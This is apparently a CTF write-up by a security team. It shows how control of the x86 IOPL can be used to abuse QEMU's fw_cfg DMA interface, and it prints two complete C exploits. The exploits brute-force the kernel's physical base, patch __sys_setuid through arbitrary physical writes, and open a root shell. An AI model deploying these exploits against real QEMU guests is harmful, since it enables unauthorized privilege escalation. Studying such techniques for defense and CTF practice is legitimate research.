Intro
In this post, we will talk about exploiting a weird x86 only primitive. We would recommend reading this blog post before continuing with this one to better understand how I/O privilege levels work in x86.
x86 IOPL
I/O ports
There are two ways of interacting with physical devices:
- I/O ports: this is the legacy way of doing it. There are a maximum of 2^16 ports used to interact with the different devices. These ports can be accessed using in, out and all the different variants of these two instructions.
- MMIO (Memory Mapped I/O): the more “modern” way of doing it. With this method you can directly read or write in a specific physical address that is shared with the target device.
Different types of devices exist but we are interested primarily in hard drives/CD-ROMS and potentially in devices that use DMA transfers.
Internals
The rflags register has a two bit field called IOPL (I/O Privilege Level). If the CPL (Current Privilege Level) is lower than or equal to the thread’s IOPL then the processor is enabled to interact with the ports. The other way to gain access to I/O ports is to modify IOPB or the corresponding bit mask in the TSS (to better understand this read the article linked in “Intro”).
Keep in mind that the address of the TSS is predictable so the second method could come in handy. For more information on this matter you can read @leave’s article on cpu entry area.
Pwning
Primitive
The primitive is simple: we can modify IOPL as we wish. In this case we will set it to 3 so that we can use all I/O ports from ring 3.
Objective
The objective is to read flag.txt possibly without directly interacting with the device that stores the file itself, to make the exploit as volatile as possible. Keep in mind that the we are testing exploits on QEMU and not on an actual device.
Environment setup
For context, this is how we were running QEMU locally:
#!/bin/sh
qemu-system-x86_64 \
-m 3.5G \
-no-reboot \
-nographic \
-cpu host \
-smp cores=2 \
-kernel bzImage \
-initrd initramfs.cpio.gz \
-drive file=flag.txt,if=virtio,format=raw,readonly \
-append "console=ttyS0 quiet kaslr=on" \
-monitor tcp:127.0.0.1:4444,server,nowait \
-s
The kernel’s version is 6.14.0 but the exploit is not kernel version or build dependent and it also works with KVM enabled.
Exploring different paths
Initially we dumped all the emulated devices from QEMU monitor with info qtree
We tried to interact with the emulated PCI device to read directly the flag but it is not a simple task to do for various reasons:
- this path is device specific (it depends on what type of storage you are using)
- it’s hard to gain privilege escalation
- it could require MMIO interaction
After wasting our time with the first path, we gave a second look at the list of emulated devices and this particular device caught @prosti’s attention…
QEMU’s fw-cfg emulated device
Do you see it? dma_enabled = true kind of sticks out and for this reason I decided to get more information about the device. The best documentation that I found is from OSDev and QEMU’s official docs site. If you have time I’d recommend to read one of the two docs (it’s a pretty short read).
FW CFG stands for Firmware Configuration. The device is used to easily pass files from the guest to the VM. As QEMU’s documentation states:
“This hardware interface allows the guest to retrieve various data items (blobs) that can influence how the firmware configures itself, or may contain tables to be installed for the guest OS. Examples include device boot order, ACPI and SMBIOS tables, virtual machine UUID, SMP and NUMA information, kernel/initrd images for direct (Linux) kernel booting, etc.”
Interacting with the device is quite easy and can be done with PIO or MMIO. We will use three ports with fixed addresses
#define FW_CFG_PORT_SEL 0x510 // 16-bit port
#define FW_CFG_PORT_DATA 0x511 // 8-bit port
#define BIOS_CFG_DMA_ADDR_HIGH 0x514 // 32-bit port
#define BIOS_CFG_DMA_ADDR_LOW 0x518 // 32-bit port
Each available blob of data or file is associated to a selector. To select the blob just write the selector’s value in FW_CFG_PORT_SEL. After that you can start reading the contents of the blob just by reading in loop from port FW_CFG_PORT_DATA.
These are the fixed selectors that are listed in OSDev’s post:
#define FW_CFG_SIGNATURE 0x0000
#define FW_CFG_ID 0x0001
#define FW_CFG_DIR 0x0019
To test if the device is actually present, read 4 bytes from FW_CFG_SIGNATURE. This should return the string “QEMU”.
To gain information about the available additional files we will use the selector FW_CFG_DIR. The first four bytes read will be a 32-bit big-endian number which represents the number of available files. Immediately after the count, there is a sequence of entries of the following struct:
struct FWCfgFile { /* an individual file entry, 64 bytes total */
uint32_t size; /* size of referenced fw_cfg item, big-endian */
uint16_t select; /* selector key of fw_cfg item, big-endian */
uint16_t reserved;
char name[56]; /* fw_cfg item name, NUL-terminated ascii */
};
Dumping all the structures reveals that there is nothing interesting for us unfortunately but this raised a question: why is there a gap in OSDev’s fixed selector list? Looking at QEMU’s source code we found out that there are many other fixed selectors that are not well documented. Here is the complete list:
#define FW_CFG_SIGNATURE 0x00
#define FW_CFG_ID 0x01
#define FW_CFG_UUID 0x02
#define FW_CFG_RAM_SIZE 0x03
#define FW_CFG_NOGRAPHIC 0x04
#define FW_CFG_NB_CPUS 0x05
#define FW_CFG_MACHINE_ID 0x06
#define FW_CFG_KERNEL_ADDR 0x07
#define FW_CFG_KERNEL_SIZE 0x08
#define FW_CFG_KERNEL_CMDLINE 0x09
#define FW_CFG_INITRD_ADDR 0x0a
#define FW_CFG_INITRD_SIZE 0x0b
#define FW_CFG_BOOT_DEVICE 0x0c
#define FW_CFG_NUMA 0x0d
#define FW_CFG_BOOT_MENU 0x0e
#define FW_CFG_MAX_CPUS 0x0f
#define FW_CFG_KERNEL_ENTRY 0x10
#define FW_CFG_KERNEL_DATA 0x11
#define FW_CFG_INITRD_DATA 0x12
#define FW_CFG_CMDLINE_ADDR 0x13
#define FW_CFG_CMDLINE_SIZE 0x14
#define FW_CFG_CMDLINE_DATA 0x15
#define FW_CFG_SETUP_ADDR 0x16
#define FW_CFG_SETUP_SIZE 0x17
#define FW_CFG_SETUP_DATA 0x18
#define FW_CFG_FILE_DIR 0x19
This is more interesting! A lot of kernel pwn challenges in CTFs directly store the flag in initramfs.cpio.gz or rootfs.cpio.gz. Using FW_CFG_INITRD_DATA we can directly dump the contents of these files with ease. All the other selectors should just give us information that we should already know.
Happy? No. There is still one port that we haven’t used: FW_CFG_PORT_DMA. PIO is not a fast way of reading large files, for this reason QEMU offers a way of transferring all the needed data in a single and fast DMA transfer.
This is the structure that we will use for the direct memory transfer:
// fw_cfg DMA commands
typedef enum fw_cfg_ctl_t {
fw_ctl_error = 1,
fw_ctl_read = 2,
fw_ctl_skip = 4,
fw_ctl_select = 8,
fw_ctl_write = 16 // this only works on QEMU version < 2.4
} fw_cfg_ctl_t;
typedef struct FWCfgDmaAccess {
uint32_t control;
uint32_t length;
uint64_t address;
} FWCfgDmaAccess;
To check if DMA transfers are enable you have to read from the selector FW_CFG_ID and check if the second bit is active.
To setup the DMA transfer we have to store our FWCfgDmaAccess structure at a known physical memory address.
- control specifies what command you want to execute and in some cases the selector that you want to use.
- length is used for fw_ctl_read, to specify how many bytes you want to read, and fw_ctl_skip, to specify how many bytes you want to advance the seek position through the file.
- address is only used for fw_ctl_read and contains the destination physical address.
After setting up the structure we just have to write its physical address to FW_CFG_PORT_DMA_{LOW,HIGH} and that’s it! By changing the seek position of a blob of data (let’s say initrd because it’s big enough to contain all bytes from 0 to 255) we can write an arbitrary byte to an arbitrary physical address.
At this point we have to find a place to store our FWCfgDmaAccess structure. Turns out that finding a fixed physical address with user controlled data is trivial by using ptregs and SP0 as shown in @leave’s post.
Now with arbitrary physical write we can use the same oracle used to solve the challenge /dev/mem (using kptr_restrict) to find the kernel’s physical address. At that point we can patch __sys_setuid to grant any user root.
Here is the exploit written by @prosti (this one doesn’t use ptregs and SP0 because it’s meant to be a small PoC so instead I’m using /proc/self/pagemap):
#include "helpers.h"
#include <sys/io.h>
#include <endian.h>
#include <arpa/inet.h>
#include <string.h>
// PWN CONSTANTS
#define CONFIG_PHYSICAL_START 0x1000000ul
#define CONFIG_PHYSICAL_ALIGN 0x0200000ul
#define KPTR_RESTRICT "/proc/sys/kernel/kptr_restrict"
#define KPTR_RESTRICT_OFFSET 0x1eb93a0ul
#define SETUID_CHECK 0x02b960dul
#define SETUID_PATCH 0x75 // je -> jne
// CFG PORTS
#define FW_CFG_PORT_SEL 0x510
#define FW_CFG_PORT_DATA 0x511
#define BIOS_CFG_DMA_ADDR_HIGH 0x514
#define BIOS_CFG_DMA_ADDR_LOW 0x518
#define FW_CFG_SIGNATURE 0x00
#define FW_CFG_ID 0x01
#define FW_CFG_UUID 0x02
#define FW_CFG_RAM_SIZE 0x03
#define FW_CFG_NOGRAPHIC 0x04
#define FW_CFG_NB_CPUS 0x05
#define FW_CFG_MACHINE_ID 0x06
#define FW_CFG_KERNEL_ADDR 0x07
#define FW_CFG_KERNEL_SIZE 0x08
#define FW_CFG_KERNEL_CMDLINE 0x09
#define FW_CFG_INITRD_ADDR 0x0a
#define FW_CFG_INITRD_SIZE 0x0b
#define FW_CFG_BOOT_DEVICE 0x0c
#define FW_CFG_NUMA 0x0d
#define FW_CFG_BOOT_MENU 0x0e
#define FW_CFG_MAX_CPUS 0x0f
#define FW_CFG_KERNEL_ENTRY 0x10
#define FW_CFG_KERNEL_DATA 0x11
#define FW_CFG_INITRD_DATA 0x12
#define FW_CFG_CMDLINE_ADDR 0x13
#define FW_CFG_CMDLINE_SIZE 0x14
#define FW_CFG_CMDLINE_DATA 0x15
#define FW_CFG_SETUP_ADDR 0x16
#define FW_CFG_SETUP_SIZE 0x17
#define FW_CFG_SETUP_DATA 0x18
#define FW_CFG_FILE_DIR 0x19
// https://wiki.osdev.org/QEMU_fw_cfg
struct FWCfgFile {
uint32_t size; /* size of referenced fw_cfg item, big-endian */
uint16_t select; /* selector key of fw_cfg item, big-endian */
uint16_t reserved;
char name[56]; /* fw_cfg item name, NUL-terminated ascii */
};
// fw_cfg DMA commands
typedef enum fw_cfg_ctl_t {
fw_ctl_error = 1,
fw_ctl_read = 2,
fw_ctl_skip = 4,
fw_ctl_select = 8,
fw_ctl_write = 16
} fw_cfg_ctl_t;
typedef struct FWC_fg_dma_access {
uint32_t control;
uint32_t length;
uint64_t address;
} FWC_fg_dma_access;
uint8_t* initrd_cache = NULL;
uint64_t get_physical_addr(uint64_t virt_addr) {
int page_size = getpagesize();
uint64_t page_offset = virt_addr % page_size;
uint64_t virt_page_index = virt_addr / page_size;
// Open pagemap
int fd = open("/proc/self/pagemap", O_RDONLY);
if (fd == -1) {
perror("open pagemap");
return -1;
}
// Seek to the entry in pagemap
uint64_t entry;
if (lseek(fd, virt_page_index * sizeof(entry), SEEK_SET) == -1) {
perror("lseek pagemap");
close(fd);
return -1;
}
if (read(fd, &entry, sizeof(entry)) != sizeof(entry)) {
perror("read pagemap");
close(fd);
return -1;
}
close(fd);
// Check if page is present
if (!(entry & (1ULL << 63))) {
fprintf(stderr, "Page not present\n");
return -1;
}
// PFN is bits 0-54 (if present)
uint64_t pfn = entry & ((1ULL << 55) - 1);
uint64_t phys_addr = (pfn * page_size) + page_offset;
return phys_addr;
}
//
// returns physical address of a valid cmd struct and initializes it
//
uint64_t default_get_cmd(uint32_t control, uint64_t address, uint32_t length){
FWC_fg_dma_access* cmd = calloc(1, sizeof(FWC_fg_dma_access));
cmd->control = htonl(control);
cmd->address = htobe64(address);
cmd->length = htonl(length);
return get_physical_addr((uint64_t)cmd);
}
uint32_t get_initrd_size(){
uint32_t initrd_size = 0;
outw(FW_CFG_INITRD_SIZE, FW_CFG_PORT_SEL);
for(int i = 0; i < 0x4; ++i)
*((int8_t *)&initrd_size + i) = inb(FW_CFG_PORT_DATA);
return initrd_size;
}
uint8_t* read_initrd(){
uint32_t initrd_size;
uint8_t* initrd_data;
if(initrd_cache != NULL)
return initrd_cache;
initrd_size = get_initrd_size();
initrd_data = calloc(1, initrd_size);
if(initrd_data == NULL)
return NULL;
outw(FW_CFG_INITRD_DATA, FW_CFG_PORT_SEL);
for(int i = 0; i < initrd_size; ++i)
initrd_data[i] = inb(FW_CFG_PORT_DATA);
initrd_cache = initrd_data;
return initrd_data;
}
int arbw(uint64_t phys_addr, uint8_t value, uint64_t (* get_cmd)(uint32_t, uint64_t, uint32_t)){
uint64_t cmd_physaddr;
uint32_t cmd_physaddr_lo;
uint32_t cmd_physaddr_hi;
uint64_t byte_addr;
uint32_t byte_off;
uint32_t initrd_size;
uint8_t* initrd_data;
//
// Find the target byte in initrd
//
initrd_size = get_initrd_size();
initrd_data = read_initrd();
byte_addr = (uint64_t)memmem(initrd_data, initrd_size, &value, sizeof(uint8_t));
if(byte_addr == 0)
return 0;
byte_off = byte_addr - (uint64_t)initrd_data;
//
// Skip
//
if(get_cmd == NULL)
cmd_physaddr = default_get_cmd(fw_ctl_skip | fw_ctl_select | (FW_CFG_INITRD_DATA << 16), 0, byte_off);
else
cmd_physaddr = get_cmd(fw_ctl_skip | fw_ctl_select | (FW_CFG_INITRD_DATA << 16), 0, byte_off);
cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);
outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);
//
// 1 byte DMA transfer
//
if(get_cmd == NULL)
cmd_physaddr = default_get_cmd(fw_ctl_read | (FW_CFG_INITRD_DATA << 16), phys_addr, 1);
else
cmd_physaddr = get_cmd(fw_ctl_read | (FW_CFG_INITRD_DATA << 16), phys_addr, 1);
cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);
outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);
return 1;
}
uint32_t check_kptr_restrict(){
uint32_t r;
FILE* f;
f = fopen(KPTR_RESTRICT, "rb");
fscanf(f, "%d", &r);
fclose(f);
return r;
}
int main(int argc, char** argv)
{
setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
// to gain this you need an actual vuln
ioperm(0, 0xffff, 1);
// phys kaslr bruteforce (using kptr_restrict as oracle)
puts("start of bruteforce");
uint64_t phys_kbase;
for(phys_kbase = CONFIG_PHYSICAL_START + CONFIG_PHYSICAL_ALIGN * 0x10000; phys_kbase >= CONFIG_PHYSICAL_START; phys_kbase -= CONFIG_PHYSICAL_ALIGN){
if(!arbw(phys_kbase + KPTR_RESTRICT_OFFSET, 0xaa, NULL))
goto err;
}
printf("phys kbase @ %p\n", phys_kbase);
if(!arbw(phys_kbase + SETUID_CHECK, SETUID_PATCH, NULL))
goto err;
puts("pwned");
return 0;
err:
puts("exploit failed");
return 1;
}
Extra pwning
Happy now? Not quite.
Turns out that we can store the string “QEMU” (or any substring) in an arbitrary physical address. This can be done by using the selector for the signature (FW_CFG_SIGNATURE).
Wouldn’t it be funny if we could just… pwn the challenge by using that? Fun fact: you obviously can!
‘E’ is 0x45 and ‘M’ is 0x4d. If you disassemble these two bytes you will have:
These two bytes are REX prefixes. If the prefix does not have an effect on the next bytes then it is treated as a NOP instruction. By looking at the source code of __sys_setuid you can notice that we could successfully hijack the syscall by “NOPing” out the call to ns_capable_setid.
These are the instructions before patching the syscall:
And this is the function call after patching setuid:
As you can notice, the last rex.RB prefix actually changed test al, al to test r8b, r8b but it’s not a problem. Using gdb you can see that r8b is not 0 at run time so the if condition is passed!
Here is the final exploit (written by @leave, this one uses ptregs):
#include "helpers.h"
#include <sys/io.h>
#include <endian.h>
#include <sys/syscall.h>
#include <signal.h>
#include <asm/ldt.h>
#define WRITE_LDT 1
#define CONFIG_PHYSICAL_START 0x1000000ul
#define CONFIG_PHYSICAL_ALIGN 0x0200000ul
#define KPTR_RESTRICT "/proc/sys/kernel/kptr_restrict"
#define KPTR_RESTRICT_OFFSET 0x1eb93a0ul
#define SETUID_CHECK 0x02b960dul
// CFG PORTS
#define FW_CFG_PORT_SEL 0x510
#define FW_CFG_PORT_DATA 0x511
#define BIOS_CFG_DMA_ADDR_HIGH 0x514
#define BIOS_CFG_DMA_ADDR_LOW 0x518
#define FW_CFG_SIGNATURE 0x00
#define SIGNATURE "QEMU"
#define SP0_PTREGS_PHYS_ADDR 0xf60cf58; // depends on memory size, im running with 256M
// https://wiki.osdev.org/QEMU_fw_cfg
// fw_cfg DMA commands
typedef enum fw_cfg_ctl_t {
fw_ctl_error = 1,
fw_ctl_read = 2,
fw_ctl_skip = 4,
fw_ctl_select = 8,
fw_ctl_write = 16
} fw_cfg_ctl_t;
typedef struct FWCfgDmaAccess {
uint32_t control;
uint32_t length;
uint64_t address;
} FWCfgDmaAccess;
void sigfpe_handler(int sig, siginfo_t *si, void *context) {
ucontext_t *uc = (ucontext_t *)context;
uc->uc_mcontext.gregs[REG_RIP] += 3;
}
uint64_t sp0_get_cmd(uint32_t control, uint64_t address, uint32_t length) {
control = htonl(control);
address = htobe64(address);
length = htonl(length);
asm volatile(
".intel_syntax noprefix\n"
"mov r15d, %1\n"
"shl r15, 32\n"
"mov r14d, %0\n"
"or r15, r14\n"
"mov r14, %2\n"
"mov rax, 0\n"
"div rax\n"
".att_syntax prefix\n"
:
: "r" (control), "r" (length), "r" (address)
: "rax", "r14", "r15"
);
return SP0_PTREGS_PHYS_ADDR;
}
int arbw(uint64_t phys_addr, char* value, int size){
uint64_t cmd_physaddr;
uint32_t cmd_physaddr_lo;
uint32_t cmd_physaddr_hi;
uint64_t byte_addr;
uint32_t byte_off;
byte_addr = (uint64_t)memmem(SIGNATURE, sizeof(SIGNATURE), value, size);
if(byte_addr == 0)
return 0;
byte_off = byte_addr - (uint64_t)SIGNATURE;
//
// Skip
//
cmd_physaddr = sp0_get_cmd(fw_ctl_skip | fw_ctl_select | (FW_CFG_SIGNATURE << 16), 0, byte_off);
cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);
if (cmd_physaddr_hi)
outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);
//
// 1 byte DMA transfer
//
cmd_physaddr = sp0_get_cmd(fw_ctl_read | (FW_CFG_SIGNATURE << 16), phys_addr, size);
cmd_physaddr_lo = (uint32_t)(cmd_physaddr & 0xFFFFFFFFU);
cmd_physaddr_hi = (uint32_t)(cmd_physaddr >> 32);
if (cmd_physaddr_hi)
outl(htonl(cmd_physaddr_hi), BIOS_CFG_DMA_ADDR_HIGH);
outl(htonl(cmd_physaddr_lo), BIOS_CFG_DMA_ADDR_LOW);
return 0;
}
uint32_t check_kptr_restrict(){
uint32_t r;
FILE* f;
f = fopen(KPTR_RESTRICT, "rb");
fscanf(f, "%d", &r);
fclose(f);
return r;
}
void fw_cfg() {
uint64_t phys_kbase;
for (phys_kbase = CONFIG_PHYSICAL_START + CONFIG_PHYSICAL_ALIGN * 0x1000; phys_kbase >= CONFIG_PHYSICAL_START; phys_kbase -= CONFIG_PHYSICAL_ALIGN){
arbw(phys_kbase + KPTR_RESTRICT_OFFSET, SIGNATURE, sizeof(SIGNATURE));
if(check_kptr_restrict() != 0)
break;
}
printf("phys kbase @ %p\n", phys_kbase);
arbw(phys_kbase + SETUID_CHECK+0, "E", 1);
arbw(phys_kbase + SETUID_CHECK+1, "M", 1);
arbw(phys_kbase + SETUID_CHECK+2, "E", 1);
arbw(phys_kbase + SETUID_CHECK+3, "M", 1);
arbw(phys_kbase + SETUID_CHECK+4, "E", 1);
setuid(0);
system("/bin/sh");
}
int main() {
// ioperm(0, 0xffff, 1);
struct sigaction sa_fpe = {0};
sa_fpe.sa_sigaction = sigfpe_handler;
sa_fpe.sa_flags = SA_SIGINFO;
sigaction(SIGFPE, &sa_fpe, NULL);
fw_cfg();
hlt("finished");
return 0;
}
Final notes
We had lots of fun exploiting this weird primitive! The next step is to find a universal exploit that works without relying on a QEMU specific hardware interface. If you have any suggestions to improve the exploit just contact us on Discord or other social media!